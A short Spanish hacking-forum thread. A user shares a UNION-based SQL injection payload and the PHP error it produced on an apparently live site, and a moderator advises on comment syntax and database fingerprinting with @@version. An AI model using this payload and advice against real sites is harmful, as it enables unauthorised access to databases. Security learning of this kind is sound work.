elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Ético (Moderador: toxeek)
| | |-+  Injection Sqli
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Injection Sqli  (Leído 838 veces)
Nobody20000

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Injection Sqli
« en: 8 Abril 2021, 22:46 pm »


' UNION ALL SELECT 1,database(),3,4,5,6,7,8,9,10,11,12#
Estoy intentado determinar el nombre de la base de datos entre otras cosas, ya tengo el numero de columnas, pero me aparece esto.


A PHP Error was encountered

Severity: Warning

Message: Invalid argument supplied for foreach()

Filename: controllers/admin.php

Line Number: 46

Backtrace:

File: D:\\\site\\application\controllers\admin.php
Line: 46
Function: _error_handler

File: D:\\VHOSTS\\index.php
Line: 315
Function: require_once

Me ayudan.
En línea

WHK
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.497


The Hacktivism is not a crime


Ver Perfil WWW
Re: Injection Sqli
« Respuesta #1 en: 9 Abril 2021, 00:16 am »

Hola, recuerda que el signo gato no es un comentario válido, debes utilizar "--". Prueba cambiando database() por un número cualquiera, si te funciona bien es porque la base de datos no es mysql, talves pueda ser postgres o sql server. Prueba con @@version, eso debería funcionar en mysql y en sql server pero no en postgres.

El error exacto indica que no hay registros, por lo cual falla el foreach. Intenta completar la consulta en ves de romperla, intenta retornar el mismo nombre de columnas de la consulta sql original. Primero vee que tipo de base de datos es y luego intentemos con otras alternativas para ver el nombre de la base de datos.

Saludos.
« Última modificación: 9 Abril 2021, 00:17 am por WHK » En línea

Telegram: @WHK102 - Semáforo Epidemiologico Chile
Nobody20000

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: Injection Sqli
« Respuesta #2 en: 10 Abril 2021, 23:53 pm »

Grcias bro :3
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
CAST EXEC en sql injection(Automated Sql Injection)
Nivel Web
EvilGoblin 2 4,150 Último mensaje 11 Julio 2010, 22:25 pm
por EvilGoblin
GiE 4.8 - SQLi
Nivel Web
Pony-Magic 4 5,593 Último mensaje 17 Diciembre 2010, 14:37 pm
por xassiz~
SQLi
Nivel Web
hache1989 2 1,976 Último mensaje 18 Diciembre 2012, 06:15 am
por dRak0
Xss injection & sql injection pequeña duda.
Nivel Web
6666 6 2,547 Último mensaje 12 Septiembre 2014, 07:27 am
por 6666
El fin de la SQLi
Nivel Web
bytefloat 3 2,123 Último mensaje 13 Febrero 2015, 21:12 pm
por Shell Root
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines